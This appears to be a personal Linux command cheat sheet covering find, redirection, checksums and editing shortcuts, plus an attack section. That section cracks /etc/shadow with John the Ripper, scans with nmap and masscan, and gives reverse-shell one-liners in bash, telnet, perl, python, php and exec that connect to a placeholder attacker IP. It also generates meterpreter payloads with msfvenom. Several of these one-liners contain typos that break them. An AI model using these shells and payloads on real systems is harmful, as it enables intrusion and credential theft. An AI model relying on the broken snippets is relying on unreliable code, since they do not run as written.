Linux

change default application
  • open a file browser such as pcmanfm, right-click the file and select "open with".

  • choose the program or shell command, then tick the checkbox labelled “always open this kind of file ..”

zathura clipboard
  1. in the viewer, run: set selection-clipboard clipboard

  2. in ~/.config/zathura/zathurarc or /etc/zathurarc add the above command

find
  1. link

  2. find . -type f -size +10k

  3. find . -type f -atime -7

  4. find . -maxdepth 3 -type f

  5. find . -mindepth 2 -type f

  6. find /home -name "*.txt" -o -name "*.pdf"

  7. find . -regex ".*\(\.txt\|\.pdf\)$"

  8. find . -type f -name "*.txt" -delete

  9. find . -type f -perm 777

  10. find . -type f -user root -exec chown tom {} \;

  11. find . -type f -mtime +30 -name "*.log" -exec cp {} old \;

  12. find . -name "*.java" | xargs cat | grep -v '^$' | wc -l

John the Ripper
  1. unshadow /etc/passwd /etc/shadow > test_passwd

  2. john --wordlist=path_to_wordlist test_passwd

arp -l

nmap
  1. nmap -Pn -p22,80,111,49780 -A -oN nmap.txt IP

  2. nmap -v -sV IP/sub_net

masscan
  1. masscan -p1-65535,U:1-65535 IP --rate=1000

checksum
  1. echo 'hello world' | md5sum -

  2. echo 'hello world' | sha256sum -

  3. echo 'hello world' | sha512sum -

redirect input/output

  1. cmd >&n: send output to file descriptor n

  2. cmd m>&n: send file descriptor m to file descriptor n

  3. cmd > file 2>&1: redirect stdout to file, then stderr to stdout, so both end up in file

  4. cmd &> file: redirect stderr and stdout to file

  5. cmd >& file: redirect stderr and stdout to file

  6. cmd >& file 0>&1: redirect stderr, stdout and stdin to file
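
Redirections are applied left to right, which is why the order of the stderr-to-stdout and m>&n forms listed above matters. The script below is an added example, not part of the original notes; `emit` and the function names are constructed for the demo.

```shell
#!/bin/sh
# Added illustration; emit() and the function names are constructed for this demo.

# Sample command: one line on stdout (fd 1), one on stderr (fd 2).
emit() {
    echo "to-stdout"
    echo "to-stderr" >&2
}

# "cmd > file 2>&1": fd 1 is pointed at the file first, then fd 2 is made a
# copy of fd 1, so both lines are written to the file.
# (bash's "&> file" and ">& file" are shorthand for this form.)
both_to_file() {
    f=$(mktemp)
    emit > "$f" 2>&1
    cat "$f"
    rm -f "$f"
}

# "cmd 2>&1 > file": fd 2 copies fd 1 *before* fd 1 moves, so stderr still
# goes to the old stdout (captured here in $leaked) and only stdout is in the file.
reversed_order() {
    f=$(mktemp)
    leaked=$(emit 2>&1 > "$f")
    printf 'file=%s leaked=%s\n' "$(cat "$f")" "$leaked"
    rm -f "$f"
}

# "cmd m>&n" used three times to swap the streams: fd 3 saves stdout,
# stdout becomes stderr, stderr becomes the saved stdout, then fd 3 is closed.
swap_streams() {
    { emit 3>&1 1>&2 2>&3 3>&-; } 2>/dev/null
}

both_to_file
reversed_order
swap_streams
```
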

sudo
  1. echo password | sudo -S command

reverse shell
  1. bash

    • attacker: nc -nvlp 4444

    • target: bash -i >& /dev/tcp/attack_ip/attack_port 0>&1

  2. telnet

    • attacker: nc -nvlp 4444; nc -nvlp 5555

    • target: telnet attack_ip 4444 | /bin/bash | telnet attack_ip 5555

  3. netcat

  4. perl

    • attacker: nc -nvlp 4444

    • target: perl -e 'use Socket;$i="attack_ip";$p=4444;socket(S,PF_INET,SOCK_STEAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">$S");exec("/bin/bash -i");};'

  5. python

    • attacker: nc -nvlp 4444

    • target: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect("attacker_ip",attacker_port);os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i]);'

  6. php

    • attacker: nc -nvlp 4444

    • target: php -r '$sock=fsockopen("attack_ip", attack_port);exec("/bin/bash -i <&3 >&3 2>&3");'

  7. msf

    • php: msfvenom -p php/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=attacker_port -f raw > /root/shell.php

    • windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=attacker_port -f exe > /root/hacker.exe

    • linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=attacker_port -f elf > /root/shell

    • attacker

      • use exploit/multi/handler

      • set payload windows/meterpreter/reverse_tcp

      • set LHOST attacker_ip

      • set LPORT attacker_port

      • run # or exploit

  8. exec

    • attacker: nc -nvlp 4444

    • target: exec 5<>/dev/tcp/attacker_ip/attacker_port; cat <&5 | while read line; do $line 2>&5 >&5; done

terminal shorthand
  • C-u: cut from cursor to line head

  • C-k: cut from cursor to line end

  • C-w: cut from cursor to word head

  • A-d: cut from cursor to word end

  • C-y: paste the content that was cut before

  • C-a: move cursor to line head

  • C-e: move cursor to line end

  • C-b/C-f: move cursor backward/forward a character

  • A-b/A-f: move cursor backward/forward a word